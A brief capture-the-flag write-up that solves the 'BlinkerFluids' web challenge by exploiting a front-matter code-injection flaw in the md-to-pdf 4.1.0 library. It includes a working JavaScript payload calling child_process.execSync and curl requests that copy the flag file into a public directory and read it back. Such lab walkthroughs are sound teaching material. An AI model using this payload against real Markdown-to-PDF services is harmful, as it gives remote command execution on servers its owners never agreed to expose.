BlinkerFluids
1 minute to read
We have a website where we can write Markdown and transform the document to PDF:
By default, we have this Markdown content:
As we have a Node.js project, if we read package.json we can see the versions of the third-party dependencies:
{
"name": "blinker-fluids",
"version": "1.0.0",
"description": "",
"main": "index.js",
"scripts": {
"start": "node index.js"
},
"keywords": [],
"author": "rayhan0x01",
"license": "ISC",
"dependencies": {
"express": "4.17.3",
"md-to-pdf": "4.1.0",
"nunjucks": "3.2.3",
"sqlite-async": "1.1.3",
"uuid": "8.3.2"
},
"devDependencies": {
"nodemon": "^1.19.1"
}
}
We notice that md-to-pdf version 4.1.0 has a critical vulnerability (snyk.io). We only need to use this payload:
--js\n((require("child_process")).execSync("id > /tmp/RCE.txt"))\n---RCE
So we use it to copy the file flag.txt to the static/images directory:
And we transforme it to PDF:
However, it still does not work, so we can delete the file. Let’s try again using curl:
$ curl 206.189.25.173:31956/api/invoice/add -d '{"markdown_content":"---js\n((require(\"child_process\")).execSync(\"cat /flag.txt > /app/static/images/flag.txt\"))\n---RCE"}' -H 'Content-Type: application/json'
{"message":"Invoice saved successfully!"}
$ curl 206.189.25.173:31956/api/invoice/list -s | jq
[
{
"id": 7,
"invoice_id": "5b364083-a15a-41d6-a9b3-6f8e20af96aa",
"created": "2022-06-30 14:50:39"
},
{
"id": 1,
"invoice_id": "f0daa85f-b9de-4b78-beff-2f86e242d6ac",
"created": "2022-06-30 13:07:16"
}
]
And now it worked:
$ curl 206.189.25.173:31956/static/images/flag.txt
HTB{int3rG4l4c7iC_r1d3_0n_bl1nk3r_flu1d5}